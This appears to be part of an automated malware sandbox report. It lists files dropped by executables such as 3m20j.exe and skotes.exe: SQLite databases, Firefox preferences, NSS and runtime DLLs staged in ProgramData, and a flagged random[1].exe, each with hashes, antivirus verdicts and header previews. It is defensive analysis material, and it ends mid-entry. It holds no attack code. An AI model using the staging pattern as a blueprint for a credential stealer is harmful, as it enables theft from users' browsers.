                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\JDAEHJJECAEGCAAAAEGI

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\JJJKFBAAAFHJEBFIEGID

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9571
                                                                                                                                                                                                                                                          Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                          MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                          SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                          SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                          SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                          C:\ProgramData\KKJJEBFC

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fc1570cd0d.exe.log

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1216
                                                                                                                                                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1880576
                                                                                                                                                                                                                                                          Entropy (8bit):7.947827107801024
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:49152:ZRGDbjz7g+LRMpnd6dc8dwpW+8cYsjL1i:ZRGDrky0nd6dcmUT8AjL1i
                                                                                                                                                                                                                                                          MD5:FF279F4E5B1C6FBDA804D2437C2DBDC8
                                                                                                                                                                                                                                                          SHA1:2FEB3762C877A5AE3CA60EEEBC37003AD0844245
                                                                                                                                                                                                                                                          SHA-256:E115298AB160DA9C7A998E4AE0B72333F64B207DA165134CA45EB997A000D378
                                                                                                                                                                                                                                                          SHA-512:C7A8BBCB122B2C7B57C8B678C5EED075EE5E7C355AFBF86238282D2D3458019DA1A8523520E1A1C631CD01B555F7DF340545FD1E44AD678DC97C40B23428F967
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................0J...........@..........................`J.....i.....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...xnuzvlhe.0..../......^..............@...tzuttanx..... J.....................@....taggant.0...0J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2046288
